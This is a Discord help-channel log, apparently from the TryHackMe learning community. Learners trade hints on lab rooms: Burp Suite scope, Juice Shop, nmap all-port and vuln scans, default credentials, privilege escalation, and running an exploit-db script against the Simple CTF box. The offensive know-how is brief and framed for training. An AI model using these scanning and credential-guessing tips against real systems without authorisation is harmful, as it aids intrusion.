And the second question is We're going to dig for a response which issues a cookie. Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header.

So you need to find it

This is exactly the problem. I make the Happy path and i dont find it ...

I think you misunderstood the question, it's not asking you for the number of the entropy, it's asking you in which unit the entropy is measured in. Like weight is measured in kg and so on

Oh my god!.....

I'm so fucking dumb

Thanks a lot @left thunder ! and sorry @iron wigeon for wasting your time

Gave +1 Rep to @left thunder

Thanks :)

Gave +1 Rep to @left thunder

It's OK :)

Hey guys I am stuck on the 4th question of task 5 in pyramid of pain. It seems like a copy of the third question, anyone have a hint?

hey can anyone help me with burp suite: the basics task 13

my machine ip wont show up in the scope part

Which task?

task 13

i can get it to forward and drop things

but when i move to the scope part

it doesnt work at all

ive been stuck for 2 days now

could you verify and then send a screenshot of what you are seeing in burp

sure

one second

what

it wont let me paste

!docs verify

@grim flame ⬆️ follow the above to send images here

oh thank you

did you click the open browser button in burp on the attackbox????

because if yes yeah that will not work that well as it is running as root and not a normal user

use firefox with foxyproxy instead

thats without it

sorry

i get the request in my proxy intercept

i forward it

and it gets me there

so when i go to scope

to look for my machine ip

its not there

oooh after checking it again... wrong ip.... you are using the attackbox ip when you should be using the target machine ip

whats that?

there should be a start machine button that is green in one of the tasks

click that

omg

then later in the text the MACHINE_IP will change to a ip you are supposed to connect to

i just figured machine ip was my attack box ip

because i stopped the task and came back to it

so i guess i forgot about the green box

well this will help you in the future then

learning from your mistakes

so this is the ip correct?

yuup it is

wow thank you

good lesson

❤️

no problem

i shall boost this server in your honor

or do a +rep @shadow_absorber#1234 @grim flame

to award a virtual internet point

+rep @alpine kestrel

Gave +1 Rep to @alpine kestrel

that gives good feelings

there

good vibes all around thank you so much

were using this in our cyber security class and this room has been frustrating me for 2 days

my teacher told me to come to the discord

hes a cool guy

yeah definitely if he is teaching kids a great gamified hacking training platform

ok

im still having trouble finding this flag

i now have it in my scope

but i cant find the flag

well have the proxy on and let it get the results but turn of intercept if it annoys you.... then go to the ip website in your browser and click around all the links

after that check back in burp and there should be one which is random alphanumeric chars that is the one you want to view

OMG

YAY!

APOWTRUJOAUEJTOUAE

thank you so much

i clicked the submit a ticket link

then a random page popped up in scope

checked response

and there it was

THANK YOU!

GG

you just learnt a bit about how to check through a website and walking those

yeah seriously

i learned so much from this one task

wow

is there anyway to copy from the attack box to tryhackme

or i just gotta type it in

https://media.discordapp.net/attachments/692456966802374687/921063860318924800/clipboard.gif

mark text as copy then this

youre the best thank you so much

that box lets you get text too and from the attackbox

+rep @alpine kestrel

Gave +1 Rep to @alpine kestrel

no problem

like helping others learn

thank you!

Confetti!

@stuck fractal hello you said to text you if i needed help im at the OWASP juice shop "task 4 who broke my lock" i got the password for the admin but it dosent get me the flag this is what i got [admin@juice-sh.op:admin123]

nmap option to scan all ports

thought it would be using a wildcard

so -p "*"

but i guess thats wrong

Option to scan all ports is -p-

But this is scan all port thus will be take a long time

right, thx

Gave +1 Rep to @iron wigeon

I was quite a bit more specific than just "ping me if you want help"

My bad dident read the entire thing i wad in a hurry

hi folks. looking for any hints on the first flag of Overpass. I see the login page, trying to find if there's a way to sql inject it, but having no luck so far... any other owasp top 10 i should be looking at?

nevermind, got it!

Folks I have a question regarding the Red Team Firewall Evasion Room, What is the maximum size of the IP packet when running Nmap with --data-length 128 option?

I am not sure how to calculate the maximum size, I guess I am just confused and not following here

omggg nevermind

I just figured it out lol

I didn't realize that the header size was different, because I was expecting the TCP header size of 24 bytes. Then I was confused and making this way to complex. Ran the pcap capture myself and checked the header size...

I need help with a room but I cant send pictures

You have to verify first in order to be able to send images.

!docs verify

Is it ever possible or necessary to switch to the tryhackme user?

What you mean with that? 🤔

basically there's a tryhackme user on machines i've done (currently doing overpass for example)

i see that that's not the exploit path in overpass, but I'm curious is the path is ever to switch to the tryhackme user

No, there most likely is not always a tryhackme user

anyone available to help on overpass3?

anyone help me out

its showing machine will start with in few minutes but morethan a hr its not came

im waiting it to start but nothing happend

Which room?

https://tryhackme.com/room/linuxfundamentalspart2#

Can you see a box like that in the room?

yeah

i can see that

but its not opening

Unlike linux fundamentals 1, this target machine is not starting within the browser, you have to ssh into it

ok will try , thanks for the response

this

like are you supposed to be able to type in it

I was typing in it to see if it did anything

try opening http://localhost:8000 in your browser (in the attackbox)

ok

I feel like the reason its not working

is because I used Linux funds 1 thing and ssh'ed it into linux funds 3 machine

instead of using attackbox

because I don't have any time left

ok

so... what I am exactly supposed to do?

its to connect to the python http.server but it doesn't work

oh ok

How was I supposed to know user pass for Alfred room was ||admin:admin||? Is there a way to find out or is it just gung ho let's guess these before we go to burp and hydra

It might be best for you to lookup a list of default credentials. The only thing to 'know' here is that many people forget to change them.

Hi there, currently doing https://tryhackme.com/room/powershell Task 4 - Find the contents of a backup file.
Anybody got an hint, what kind of file I should search for? (.txt, .bck, Directory)

Did you use .bck extension ?

Nope, thats what I asked for. Thank you.

Gave +1 Rep to @left thunder

Well that's why I'm asking, or if this was just a typo in discord, because I think it should be .bak instead of .bck in case you search for it

Oh, then this was, why I didn't find it in the first search. Got the task done now. ^^

Hi All. I'm currently in the CC: Pen Testing room. A couple of the tasks are triggering my firewall. I tried adding a new 'allow' rule for the IP and moved it to the top, but no success. Any hints?

Hi guys,
I'm stuck with privilege escalation
I got access to the shell, with normal user (apache), I need tips how can I do privilege escalation to get access to root shell
I'm beginner and I need tips to improve my skills,

I don't wanna to read the writeups about the machine I just need tips!

I GOOGLED A LOT BUT WITHOUT RESULT

bash-3.00$ id   
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ whoami
whoami
apache
bash-3.00$ 

what does that mean ?

there are two users in the machine john and harold

Hi all
I was trying advent of code 2019... Day8
I was trying "sudo nmap -p- ipAddress" but it's taking to much time to execute and getting stuck around 24%

I can't read /etc/shadow

exactly

then how can i get access to another users

I have just one cronjob it's

root      4723  0.0  0.6  5568  780 pts/1    S+   04:15   0:00 crontab

@midnight rivet https://tryhackme.com/resources/blog/linux-privilege-escalation-suid + some links are also mentioned in the blog.

Thanks

Gave +1 Rep to @real steppe

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

what can I do with them ?

yes it's

Thank you

https://tryhackme.com/room/25daysofchristmas link to the challenges

ok ok will do @burnt rivet

thanks @burnt rivet . I was able to proceed.

Gave +1 Rep to @burnt rivet

Thanks lassi.

Gave +1 Rep to @burnt rivet

I added the mask to the allow rule to no effect. 😞 I then added my OpenVPN IP to the rule, again to no effect. Below is the security notification from my firewall. The attackerIP matches the THM VM IP (as expected) and the IP for My Device matches the IP for a wireguard tunnel on my machine. I should add that I'm on a win10 machine running kali in a VBox. Thanks again..

Gave +1 Rep to @burnt rivet

OOPS!! Forgot to paste the notification. 😖 If it helps at all?
Category: Intrusion Prevention
Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description
2/21/2022 10:53:25,High,An intrusion attempt by 10.10.56.153 was blocked.,Blocked,No Action Required,Attack: Malicious Scan Request 6,No Action Required,No Action Required,"10.10.56.153, 80",http://10.10.56.153/,"< My Device > (10.18.19.207, 1320)",10.10.56.153,"TCP, www-http"

thanks.

Gave +1 Rep to @burnt rivet

Hi, I'm doing the wonderland room. I've followed the rabbit and arrived at the door, but I can't seem to figure out how to open the door and enter wonderland

Omg, I just found it

That's so sneaky lmao

Wonderland is a good room.

I'm on rabbit right now but I'm having a few trip ups because I don't know anything about python privelage esc

if you don't know privesc it'll be hard to finish

i didn't know either got stuck there too lol

The rooms going into buffer overflow and I have no idea how to do that kinda stuff yet so I'll come back to it

Hi, guys. I need your help for Simple CTF Room.
I'm facing UnicodeDecodeError when do python script downloaded from exploit-db web site.
Could you give a hint to solve this error??
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 923: invalid continuation byte

Hello, I don’t know much about the room but I found this walkthrough

https://medium.com/@skylarphenis/tryhackme-simple-ctf-walk-through-e8bb8c8671a9

See if this can help

Thanks for the info!
I already checked the article. In the article, the author completed run the python script with no errors.
So, that's why I'm in trouble.

Gave +1 Rep to @onyx basalt

Hmm, sorry about that. Someone who probably knows more will probably help you out by the morning. I would send your question in #room-help maybe since you’re getting an error

Thank you so much!

Gave +1 Rep to @onyx basalt

Np

From what I remember the searchsploit one seemed to work for me

Hey guys
I'm new to both discord & infosec.. I'm also a subscriber of thm.. I've been trying to solve the buffer overflow room "Brainstorm"..I have a doubt regarding that.. can you help me plz

Thanks! I gonna check the searchsploit to run SQLi.

Gave +1 Rep to @junior wave

hey I'm having a problem with this question in room Red Team Engagements on task 3:

What is the first access type mentioned in the document?

To whom did you escalate the event associated with the malicious IP address?

I am doing Jr Security Analyst Intro

I think the answer should be staff members

but the answer pattern given is ^^^^ ^^^^^^^

I got the answer

@onyx basalt @junior wave
For about the python script for Simple CTF Room, I could run the script!! Thank you so much!
What I did is downloading the script from Exploit-db web site, and convert the script to python2 to 3 format by using 2to3, and also, the script use ASCII dictionary, so I've converted rockyou.txt to ASCII, at last in the script the text of dictionary need to convert to utf-8 before hashing ( I added encode('utf-8') into the script. Finally the script ran with no errors!
Thanks for your help!!

Gave +1 Rep to @onyx basalt

Gave +1 Rep to @junior wave

Hey, do we have any room on manual smtp enum..

hi guys can you help me search info for the challenge section of this room? https://tryhackme.com/room/windowsforensics1
i just need a hint to setup one tool

guys i'm on nmap switches under networking, and there's this question. how would you activate all the scripts in the vuln category, i've tried everything and it says the answer is not correct

--script=vuln

it is nearly it. I had to look it up in the man page tbh because it looked correct to me at first

interesting, nmap --script=vuln works. strange that the answer is wrong

I would have thought|| --script vuln|| would be correct as well

couldn't find anything useful in the -h and man

whats the exact room?

futhernmap

It's saying wrong answer with that? Or it's saying something like "undefined" ?

the answer is incorrect

hmm, strange, because for me it was correct

Have you refreshed the page with ctrl + F5 already ?

yes

i've been on it for almost a week, i asked because i was fed up

Okay, but to make it sure, with ctrl + F5? Not just a regular page refresh, or manually cleared cache ?

Also, maybe provide a screenshot of your answer, you will have to verify for that first

!docs verify

one moment

I am in the sqlmap map room and have downloaded sqlmap from github. I added sqlmap.py to /usr/local/bin, but when I run sqlmap.py outside of my /TOOLS directory, I receive [!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details. Am I supposed to copy everything from sql-master/ into /usr/local/bin? Should I have just unzipped everything into /usr/local/bin?

couple of rooms asked to scan for all ports with nmap, but they're taking literally forever, and puts a real damper on my momentum (and precious time). is there no way to make scanning all ports faster?

https://tenor.com/view/goku-bowing-respect-peace-dragon-ball-super-gif-16723914

thank you senpai

Gave +1 Rep to @burnt rivet